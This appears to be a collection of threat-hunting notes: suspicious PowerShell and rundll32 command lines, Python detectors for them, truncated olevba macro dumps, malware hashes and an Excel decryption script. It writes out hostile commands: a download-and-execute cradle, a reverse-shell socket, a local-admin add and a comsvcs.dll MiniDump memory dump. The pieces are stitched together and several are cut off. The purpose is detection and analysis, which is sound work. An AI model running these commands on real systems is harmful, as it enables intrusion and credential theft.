// suspicious PowerShell commands: contacting URLs, adding local admins, receiving commands, fingerprinting hardware (UUID / serial numbers), staging procdump from a share
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
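Command-line triage for the two gists above (the suspicious PowerShell list and the comsvcs.dll MiniDump detection), as an added example that is not code from either gist. It decodes `-EncodedCommand` payloads so the download cradle hidden behind base64 still matches, and it normalises the comsvcs.dll MiniDump call whether the export is named or called by ordinal (#24), with a comma or a space after the DLL. The `SAMPLE_CMDLINES` are constructed for this example (documentation-range IPs, made-up PIDs and paths); the indicator names are this example's own.

```python
"""Triage process command lines for the PowerShell and comsvcs MiniDump patterns above."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Indicators taken from the PowerShell gist: download cradle, reverse shell,
# local-admin add, hardware fingerprinting via WMI, procdump staged from a share.
PS_INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "download_cradle": re.compile(r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:net\.webclient|downloadstring)\b"),
    "reverse_shell": re.compile(r"(?i)system\.net\.sockets\.tcpclient"),
    "add_local_admin": re.compile(r"(?i)\badd-localgroupmember\b|S-1-5-32-544"),
    "hw_fingerprint": re.compile(r"(?i)get-wmiobject\s+win32_(?:computersystemproduct|bios|physicalmedia)\b"),
    "procdump_staging": re.compile(r"(?i)copy\s+\\\\\S+\\procdump\.exe"),
    "exec_bypass": re.compile(r"(?i)\s-(?:exec|ep|executionpolicy)\s+bypass\b"),
}
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# rundll32 [path]comsvcs.dll[, ](MiniDump|#24) <pid> <dump path> full
COMSVCS_MINIDUMP = re.compile(
    r'(?i)rundll32(?:\.exe)?"?\s+"?(?P<dll>\S*comsvcs\.dll)"?[\s,]+'
    r'(?P<export>minidump|#24)\s+(?P<pid>\d+)\s+(?P<path>"[^"]+"|\S+)\s+full\b'
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid encoded command; leave it to the plaintext checks


def triage(cmdline: str) -> dict:
    """Classify one command line: indicator names, decoded payload, MiniDump details."""
    hits: List[str] = []
    decoded = decode_encoded_command(cmdline)
    # Match against the raw line and, when present, the decoded payload too.
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    for name, rx in PS_INDICATORS.items():
        if rx.search(haystack):
            hits.append(name)
    if decoded is not None:
        hits.append("encoded_command")
    dump = None
    m = COMSVCS_MINIDUMP.search(cmdline)
    if m:
        hits.append("comsvcs_minidump")
        dump = {
            "dll": m["dll"],
            "export": m["export"],
            "by_ordinal": m["export"].startswith("#"),
            "pid": int(m["pid"]),
            "path": m["path"].strip('"'),
        }
    return {"hits": sorted(hits), "decoded": decoded, "dump": dump}


def scan(cmdlines: List[str]) -> List[Tuple[str, dict]]:
    """Return only the command lines that raised at least one indicator."""
    return [(c, r) for c in cmdlines if (r := triage(c))["hits"]]


def _encode(ps: str) -> str:
    """Build a PowerShell -EncodedCommand blob (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines modelled on the gist entries (not real telemetry).
SAMPLE_CMDLINES = [
    "powershell -w 1 -exec bypass -e "
    + _encode("iex ((New-Object Net.WebClient).DownloadString('http://198.51.100.7:8080/a'))"),
    "powershell.exe -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('198.51.100.7',4444)\"",
    'powershell.exe -c "Add-LocalGroupMember -Group Administrators -Member svc_backup"',
    "powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber",
    'C:\\Windows\\system32\\cmd.exe /c powershell -Command "copy \\\\server\\share\\procdump.exe C:\\dump.exe"',
    '"C:\\Windows\\System32\\rundll32.exe" C:\\Windows\\System32\\comsvcs.dll MiniDump 652 \\Windows\\Temp\\lsa.dmp full',
    "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, #24 652 C:\\Temp\\lsa.dmp full",
    'powershell.exe -Command "Get-Process | Where-Object CPU -gt 100"',  # benign control
]

if __name__ == "__main__":
    for cmd, result in scan(SAMPLE_CMDLINES):
        print(result["hits"], "<-", cmd[:80])
        if result["dump"]:
            print("   MiniDump of PID", result["dump"]["pid"], "to", result["dump"]["path"])
```

The decoded payload is checked together with the raw line, so an encoded cradle raises both `encoded_command` and `download_cradle`; the ordinal form of the MiniDump call is reported with `by_ordinal` set so a rule can treat `#24` and `MiniDump` as the same technique.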
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:64
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:32
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Dim isR As Boolean
https://www.virustotal.com/gui/search/gen_excel_xor_obfuscation_velvetsweatshop/comments
XOR encrypted .XLS
0d01bf2ba4985397910a7924c02036b71132febe46f5f9b79a1bd3de440dc53d
0e334135f0bc0e6832c50ec2fe3681816fd63a1843214a433cc92f59e77a4247
1bcf2d09a64a536efa4831600d00c6daad6b1751fa6d2ae111a7abb7ff0b61bb
307ea21a8cba83a8d7e58ebbd131a63cb8ae3d2281bd7a93004d8be78b70107e
386f8f8b2a9d16767e1b17b714e87cd4f0b234bfded0ed2752b9a2568edeb15f
640508607e89322f8a4cb844f33fad2ef51fc22afdbec3224ec8f9ef8a345edc
92859da9f5ec97c9c7646122138e996bb57021bb9fdee295f5ddb960390682e4
import os
import win32com.client

filename = r"419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e"
password = "VelvetSweatshop"  # Excel's built-in default password: such files open without a prompt
encryption_removed_filename = filename + '.saved.xls'

xlApp = win32com.client.Dispatch("Excel.Application")
xlApp.Visible = False
xlApp.DisplayAlerts = False  # suppress overwrite / compatibility prompts that would hang the script
xlApp.AutomationSecurity = 3  # msoAutomationSecurityForceDisable: never run the sample's macros
# Excel resolves relative paths against its own working directory, so pass absolute paths
xlwb = xlApp.Workbooks.Open(os.path.abspath(filename), Password=password)
# FileFormat 56 = xlExcel8 (BIFF8 .xls); Password="" writes the copy without encryption
xlwb.SaveAs(os.path.abspath(encryption_removed_filename), FileFormat=56, Password="")
xlwb.Close(SaveChanges=False)
xlApp.Quit()
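Before driving Excel at all, a hunter can tell from the BIFF `FILEPASS` record whether an .xls is XOR-obfuscated (the scheme behind the VelvetSweatshop samples collected above) or RC4-encrypted. The following is an added example, not code from the gist: it walks the Workbook stream's records (MS-XLS layout, `[type:u16][size:u16][data]`), stops at `FILEPASS` (0x002F) and reports the encryption type from its first `wEncryptionType` field. The sample streams are constructed inline and are not taken from any of the listed hashes; `check_xls` assumes the third-party `olefile` package for reading a real file and is only needed for that path.

```python
"""Classify .xls encryption from the BIFF FILEPASS record without opening Excel."""
import struct
from typing import Iterator, Optional, Tuple

BOF = 0x0809       # beginning of substream
EOF = 0x000A
CODEPAGE = 0x0042
FILEPASS = 0x002F  # encryption header; every record after it is obfuscated/encrypted


def iter_records(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk BIFF records in order; a truncated trailing record simply ends the walk."""
    off = 0
    while off + 4 <= len(stream):
        rtype, size = struct.unpack_from("<HH", stream, off)
        off += 4
        yield rtype, stream[off:off + size]
        off += size


def filepass_info(workbook_stream: bytes) -> Optional[dict]:
    """Describe the FILEPASS record, or return None when the workbook is plaintext."""
    for rtype, data in iter_records(workbook_stream):
        if rtype != FILEPASS:
            continue
        if len(data) < 2:
            return {"encryption": "malformed"}
        (enc_type,) = struct.unpack_from("<H", data)
        if enc_type == 0 and len(data) >= 6:
            # XOR obfuscation: 16-bit key and 16-bit password verifier follow.
            key, verifier = struct.unpack_from("<HH", data, 2)
            return {"encryption": "xor", "key": key, "verifier": verifier,
                    "try_password": "VelvetSweatshop"}
        if enc_type == 1 and len(data) >= 6:
            # RC4 family: EncryptionVersionInfo (vMajor, vMinor) selects the variant.
            major, minor = struct.unpack_from("<HH", data, 2)
            if (major, minor) == (1, 1):
                return {"encryption": "rc4"}
            if major in (2, 3, 4) and minor == 2:
                return {"encryption": "rc4-cryptoapi"}
            return {"encryption": "rc4-unknown-version", "version": (major, minor)}
        return {"encryption": "unknown", "type": enc_type}
    return None


def check_xls(path: str) -> Optional[dict]:
    """Read the Workbook (BIFF8) or Book (BIFF5) stream of a real .xls with olefile."""
    import olefile  # assumption: pip install olefile; only needed for real files
    ole = olefile.OleFileIO(path)
    try:
        for name in ("Workbook", "Book"):
            if ole.exists(name):
                return filepass_info(ole.openstream(name).read())
        return None
    finally:
        ole.close()


def _record(rtype: int, data: bytes) -> bytes:
    return struct.pack("<HH", rtype, len(data)) + data


# Constructed sample streams (not real malware): BOF for BIFF8 workbook globals is
# vers, dt, rupBuild, rupYear, flags, verLowestBiff.
_BOF = _record(BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0x0600))
SAMPLE_PLAIN = _BOF + _record(CODEPAGE, struct.pack("<H", 0x04B0)) + _record(EOF, b"")
# XOR-obfuscated: wEncryptionType 0, then key and verifier; trailing bytes stand in
# for obfuscated records that must not be parsed.
SAMPLE_XOR = _BOF + _record(FILEPASS, struct.pack("<HHH", 0, 0x1234, 0xABCD)) + b"\x9e\x17\x03\x00" * 4
# RC4 standard: wEncryptionType 1, version (1, 1), then 48 bytes of salt/verifier/hash.
SAMPLE_RC4 = _BOF + _record(FILEPASS, struct.pack("<HHH", 1, 1, 1) + bytes(48)) + bytes(8)

if __name__ == "__main__":
    for label, stream in (("plain", SAMPLE_PLAIN), ("xor", SAMPLE_XOR), ("rc4", SAMPLE_RC4)):
        print(label, "->", filepass_info(stream))
```

A `FILEPASS` with type 0 is the cheap triage signal for this family: the XOR key is only 16 bits and Excel tries the default password automatically, so these files are worth opening with the script above (or with oletools, which handles VelvetSweatshop itself) rather than being dismissed as "password protected".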
419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e
b6d8909eef7b6a573ed668c4f31e8da8dc80f80c2a45074c81a157aebafb1ed7
df08a59ec2e0cbb8a061d56fa66bcb9e0ab8bfe5201f84ae07b7ac1832c13301
748d566d867a4667be25bdcba01e114bb3e8fa09d4a1d007f36ec9b093023dc5
f4256d69b126ae9f3ae76caa6a24fade4a2cd1f036abf1e3177124c7086725dd
1eef14ff38cdfe55bb255de4d5f8c383198987f113898a8e3866a0752c4d337b
8257663d61277d20aa2fecf3e54a6a04a135919b14c97590a3cd1022c0e4590c
d4aec8c01b61e2fc6eb9a3ad715a367f8ccb38df4dcf77aaae405611b4edb9b9
ca7ef70f3dc9a6e3bac27062d139e3588c13c2601ae71b1fe9ed1ca864281cb5
c31a630707b3f2f378915107920eb4bfcb806c0b77be6037e2e8a63596cd797a
// Raccine
// A Simple Ransomware Vaccine
// https://github.com/Neo23x0/Raccine
//
// Florian Roth, Ollie Whitehouse
#include <WCHAR.h>
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public RUNNING As Boolean
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a16ac529b34aab3eb7e262b830d73aa78aa967ad4a8810349040cdbbe2e885b5
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If Mac Then
Private Sub Document_Open()